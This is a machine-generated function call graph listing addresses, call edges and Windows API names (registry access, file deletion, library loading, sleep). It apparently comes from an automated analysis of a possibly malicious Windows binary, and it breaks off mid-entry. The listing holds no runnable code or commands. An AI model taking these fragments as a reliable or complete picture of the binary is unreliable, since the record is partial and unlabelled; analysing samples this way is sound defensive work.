8426->8491 8427->8426 8429 409451 8428->8429 8430 413ad7 8428->8430 8438 405695 8429->8438 8431 405781 4 API calls 8430->8431 8432 413af0 8431->8432 8433 405781 4 API calls 8432->8433 8434 413afe 8433->8434 8435 405762 4 API calls 8434->8435 8436 413b0e 8435->8436 8436->8429 8437 405781 4 API calls 8436->8437 8437->8429 8439 4056a0 8438->8439 8440 4056b9 8438->8440 8441 402bab 2 API calls 8439->8441 8440->8337 8442 4056b3 8441->8442 8443 402bab 2 API calls 8442->8443 8443->8440 8445 40a39a 8444->8445 8446 40a368 8444->8446 8447 4031e5 4 API calls 8445->8447 8449 40a3af 8445->8449 8450 4031e5 4 API calls 8446->8450 8447->8449 8448 40a3ca 8452 40a38a 8448->8452 8453 408b2c 4 API calls 8448->8453 8449->8448 8451 408b2c 4 API calls 8449->8451 8450->8452 8451->8448 8452->8326 8453->8452 8455 4031e5 4 API calls 8454->8455 8456 408b3e 8455->8456 8456->8399 8458 40a202 8457->8458 8459 40a1c3 8457->8459 8613 405f08 8458->8613 8460 405b6f 6 API calls 8459->8460 8463 40a1d0 8460->8463 8462 40a1fc 8462->8417 8463->8462 8466 40a1f3 8463->8466 8501 40a45b 8463->8501 8465 40a333 8467 402bab 2 API calls 8465->8467 8469 402bab 2 API calls 8466->8469 8467->8462 8469->8462 8470 405b6f 6 API calls 8472 40a245 8470->8472 8471 40a25d 8473 405b6f 6 API calls 8471->8473 8472->8471 8474 413a58 13 API calls 8472->8474 8479 40a26b 8473->8479 8475 40a257 8474->8475 8478 402bab 2 API calls 8475->8478 8476 40a28b 8477 405b6f 6 API calls 8476->8477 8484 40a297 8477->8484 8478->8471 8479->8476 8480 40a284 8479->8480 8620 40955b 8479->8620 8482 402bab 2 API calls 8480->8482 8482->8476 8483 405b6f 6 API calls 8488 40a2b7 8483->8488 8485 40a2b0 8484->8485 8484->8488 8627 40968e 8484->8627 8486 402bab 2 API calls 8485->8486 8486->8488 8488->8465 8488->8483 8490 402bab 2 API calls 8488->8490 8637 4098a7 8488->8637 8490->8488 8492 402b7c 2 API calls 8491->8492 8493 404512 8492->8493 8495 404585 GetLastError 8493->8495 8496 402bab 2 API calls 8493->8496 8499 40457c 8493->8499 8500 402b7c 2 API calls 8493->8500 8892 4044a7 8493->8892 8497 404592 8495->8497 8495->8499 8496->8493 8498 402bab 2 API calls 8497->8498 8498->8499 8499->8426 8500->8493 8646 40642c 8501->8646 8503 40a469 8504 40c4ff 8503->8504 8649 4047e6 8503->8649 8504->8466 8507 4040bb 12 API calls 8508 40bf88 8507->8508 8508->8504 8509 403c90 8 API calls 8508->8509 8510 40bfaa 8509->8510 8511 402b7c 2 API calls 8510->8511 8513 40bfc1 8511->8513 8512 40c4f3 8514 403f9e 5 API calls 8512->8514 8515 40c3aa 8513->8515 8656 40a423 8513->8656 8514->8504 8515->8512 8518 4056bf 2 API calls 8515->8518 8521 40c4e3 8515->8521 8516 402bab 2 API calls 8516->8512 8520 40c3d2 8518->8520 8520->8521 8523 4040bb 12 API calls 8520->8523 8521->8516 8522 405f08 4 API calls 8524 40c005 8522->8524 8525 40c3f3 8523->8525 8526 40c021 8524->8526 8659 40a43f 8524->8659 8528 40c4d1 8525->8528 8716 405a52 8525->8716 8527 4031e5 4 API calls 8526->8527 8530 40c034 8527->8530 8533 413aca 4 API calls 8528->8533 8539 4031e5 4 API calls 8530->8539 8534 40c4dd 8533->8534 8537 405695 2 API calls 8534->8537 8535 40c411 8721 405a87 8535->8721 8536 402bab 2 API calls 8536->8526 8537->8521 8545 40c04d 8539->8545 8540 40c4b3 8541 402bab 2 API calls 8540->8541 8543 40c4cb 8541->8543 8542 405a52 4 API calls 8553 40c423 8542->8553 8544 403f9e 5 API calls 8543->8544 8544->8528 8547 4031e5 4 API calls 8545->8547 8546 405a87 4 API calls 8546->8553 8548 40c085 8547->8548 8550 4031e5 4 API calls 8548->8550 8549 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8549->8553 8551 40c09c 8550->8551 8554 4031e5 4 API calls 8551->8554 8552 402bab 2 API calls 8552->8553 8553->8540 8553->8542 8553->8546 8553->8549 8553->8552 8555 40c0b3 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c0ca 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c0e7 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c100 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c119 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c132 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c14b 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c164 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c17d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c196 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c1af 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c1c8 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c1de 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c1f4 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c20d 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c226 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c23f 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c258 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c273 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c28a 8592->8593 8594 4031e5 4 API calls 8593->8594 8597 40c2d5 8594->8597 8595 40c3a2 8596 402bab 2 API calls 8595->8596 8596->8515 8597->8595 8598 4031e5 4 API calls 8597->8598 8599 40c315 8598->8599 8600 40c38b 8599->8600 8662 404866 8599->8662 8601 403c40 5 API calls 8600->8601 8603 40c397 8601->8603 8605 403c40 5 API calls 8603->8605 8605->8595 8606 40c382 8608 403c40 5 API calls 8606->8608 8608->8600 8610 406c4c 6 API calls 8611 40c355 8610->8611 8611->8606 8686 4126a7 8611->8686 8614 4031e5 4 API calls 8613->8614 8615 405f1d 8614->8615 8616 405f55 8615->8616 8617 402b7c 2 API calls 8615->8617 8616->8462 8616->8465 8616->8470 8616->8471 8618 405f36 8617->8618 8618->8616 8619 4031e5 4 API calls 8618->8619 8619->8616 8621 409673 8620->8621 8626 40956d 8620->8626 8621->8480 8622 408b45 6 API calls 8622->8626 8623 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8623->8626 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8626 8625 402bab GetProcessHeap HeapFree 8625->8626 8626->8621 8626->8622 8626->8623 8626->8624 8626->8625 8628 4040bb 12 API calls 8627->8628 8636 4096a9 8628->8636 8629 40989f 8629->8485 8630 409896 8631 403f9e 5 API calls 8630->8631 8631->8629 8633 408b45 6 API calls 8633->8636 8634 402bab GetProcessHeap HeapFree 8634->8636 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8635->8636 8636->8629 8636->8630 8636->8633 8636->8634 8636->8635 8885 4059d8 8636->8885 8638 4040bb 12 API calls 8637->8638 8644 4098c1 8638->8644 8639 4099fb 8639->8488 8640 4099f3 8641 403f9e 5 API calls 8640->8641 8641->8639 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8639 8644->8640 8644->8642 8644->8643 8645 402bab GetProcessHeap HeapFree 8644->8645 8645->8644 8647 4031e5 4 API calls 8646->8647 8648 406441 GetNativeSystemInfo 8647->8648 8648->8503 8650 4031e5 4 API calls 8649->8650 8654 40480a 8650->8654 8651 40485d 8651->8504 8651->8507 8652 4031e5 4 API calls 8652->8654 8653 40484f 8655 403c40 5 API calls 8653->8655 8654->8651 8654->8652 8654->8653 8655->8651 8657 4031e5 4 API calls 8656->8657 8658 40a435 8657->8658 8658->8522 8660 4031e5 4 API calls 8659->8660 8661 40a451 8660->8661 8661->8536 8663 4031e5 4 API calls 8662->8663 8664 40487c 8663->8664 8664->8606 8665 406c4c 8664->8665 8726 4068eb 8665->8726 8667 406e02 8667->8610 8668 406cab 8738 40469b 8668->8738 8669 406c6c 8669->8667 8669->8668 8735 406894 8669->8735 8676 406df1 8677 40469b 4 API calls 8676->8677 8677->8667 8678 406cef 8678->8676 8679 4031e5 4 API calls 8678->8679 8680 406d26 8679->8680 8680->8676 8681 40771e 6 API calls 8680->8681 8685 406d57 8681->8685 8682 406da2 8683 4031e5 4 API calls 8682->8683 8683->8676 8685->8682 8751 4068b0 8685->8751 8687 4126bb 8686->8687 8688 4126d1 8686->8688 8689 412840 8687->8689 8807 40488c 8687->8807 8688->8689 8813 407055 8688->8813 8689->8606 8693 412837 8695 403c40 5 API calls 8693->8695 8695->8689 8697 41281e 8698 4070ff 6 API calls 8697->8698 8698->8693 8699 407055 6 API calls 8700 412742 8699->8700 8700->8697 8701 40719a 6 API calls 8700->8701 8702 41276e 8701->8702 8703 412804 8702->8703 8829 406f4a 8702->8829 8857 4070ff 8703->8857 8706 41279a 8835 412553 8706->8835 8879 405907 8716->8879 8718 405a61 8719 405a76 8718->8719 8720 405907 4 API calls 8718->8720 8719->8535 8720->8718 8722 402b7c 2 API calls 8721->8722 8724 405a99 8722->8724 8725 405ade 8724->8725 8882 40595e 8724->8882 8725->8553 8754 4076a8 8726->8754 8728 406913 8729 406a61 8728->8729 8730 40771e 6 API calls 8728->8730 8729->8669 8734 406949 8730->8734 8731 40771e 6 API calls 8731->8734 8732 404678 4 API calls 8732->8734 8734->8729 8734->8731 8734->8732 8760 4046c2 8734->8760 8736 4031e5 4 API calls 8735->8736 8737 4068a6 8736->8737 8737->8669 8739 4046b4 8738->8739 8740 4046a4 8738->8740 8739->8667 8742 404678 8739->8742 8741 4031e5 4 API calls 8740->8741 8741->8739 8743 4031e5 4 API calls 8742->8743 8744 40468b 8743->8744 8744->8667 8745 40771e 8744->8745 8746 407737 8745->8746 8750 407748 8745->8750 8747 407644 6 API calls 8746->8747 8748 407741 8747->8748 8749 406baa 6 API calls 8748->8749 8749->8750 8750->8678 8752 4031e5 4 API calls 8751->8752 8753 4068c2 8752->8753 8753->8685 8755 4076c1 8754->8755 8759 4076d2 8754->8759 8768 407644 8755->8768 8759->8728 8761 4046d3 8760->8761 8762 4046d9 8760->8762 8803 40464c 8761->8803 8765 4046e9 8762->8765 8766 404678 4 API calls 8762->8766 8764 404714 8764->8734 8765->8764 8767 40469b 4 API calls 8765->8767 8766->8765 8767->8764 8769 407653 8768->8769 8770 407661 8768->8770 8769->8770 8776 406a6b 8769->8776 8772 406baa 8770->8772 8773 406bbb 8772->8773 8775 406bc8 8772->8775 8773->8775 8784 407402 8773->8784 8775->8759 8780 406a81 8776->8780 8777 402b7c 2 API calls 8777->8780 8778 406b8b 8778->8770 8779 406894 4 API calls 8779->8780 8780->8777 8780->8778 8780->8779 8781 406b96 8780->8781 8782 402bab 2 API calls 8780->8782 8783 402bab 2 API calls 8781->8783 8782->8780 8783->8778 8785 407644 6 API calls 8784->8785 8786 407412 8785->8786 8787 402b7c 2 API calls 8786->8787 8794 407450 8786->8794 8788 407483 8787->8788 8789 402b7c 2 API calls 8788->8789 8788->8794 8792 4074ce 8789->8792 8790 4074da 8791 4068cc 2 API calls 8790->8791 8791->8794 8792->8790 8793 402b7c 2 API calls 8792->8793 8797 40751f 8793->8797 8794->8775 8795 40752b 8796 4068cc 2 API calls 8795->8796 8796->8790 8797->8795 8799 4068cc 8797->8799 8800 4068d6 8799->8800 8801 4068e3 8799->8801 8800->8801 8802 402bab GetProcessHeap HeapFree 8800->8802 8801->8795 8802->8801 8804 404666 8803->8804 8805 404659 8803->8805 8804->8762 8806 4031e5 4 API calls 8805->8806 8806->8804 8808 4047e6 5 API calls 8807->8808 8809 404897 8808->8809 8810 40489c 8809->8810 8865 4047c7 8809->8865 8810->8688 8814 40706f 8813->8814 8815 407084 8813->8815 8814->8815 8816 407644 6 API calls 8814->8816 8820 4070e4 8815->8820 8868 406fd2 8815->8868 8817 40707d 8816->8817 8819 406baa 6 API calls 8817->8819 8819->8815 8820->8693 8821 40719a 8820->8821 8822 4071b0 8821->8822 8826 4071c5 8821->8826 8823 407644 6 API calls 8822->8823 8822->8826 8824 4071be 8823->8824 8825 406baa 6 API calls 8824->8825 8825->8826 8827 406fd2 4 API calls 8826->8827 8828 407226 8826->8828 8827->8828 8828->8697 8828->8699 8830 406f64 8829->8830 8834 406f75 8829->8834 8831 407644 6 API calls 8830->8831 8832 406f6e 8831->8832 8833 406baa 6 API calls 8832->8833 8833->8834 8834->8706 8876 4060ac 8835->8876 8858 407116 8857->8858 8859 40712b 8857->8859 8858->8859 8860 407644 6 API calls 8858->8860 8862 406fd2 4 API calls 8859->8862 8864 407187 8859->8864 8861 407124 8860->8861 8863 406baa 6 API calls 8861->8863 8862->8864 8863->8859 8864->8697 8866 4031e5 4 API calls 8865->8866 8867 4047d9 8866->8867 8867->8688 8869 406fde 8868->8869 8870 407027 8869->8870 8871 4031e5 4 API calls 8869->8871 8870->8820 8872 406ffa 8871->8872 8873 4031e5 4 API calls 8872->8873 8874 407011 8873->8874 8875 4031e5 4 API calls 8874->8875 8875->8870 8877 4031e5 4 API calls 8876->8877 8878 4060bb 8877->8878 8878->8878 8880 4031e5 4 API calls 8879->8880 8881 40591a 8880->8881 8881->8718 8883 4031e5 4 API calls 8882->8883 8884 405971 8883->8884 8884->8724 8886 4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 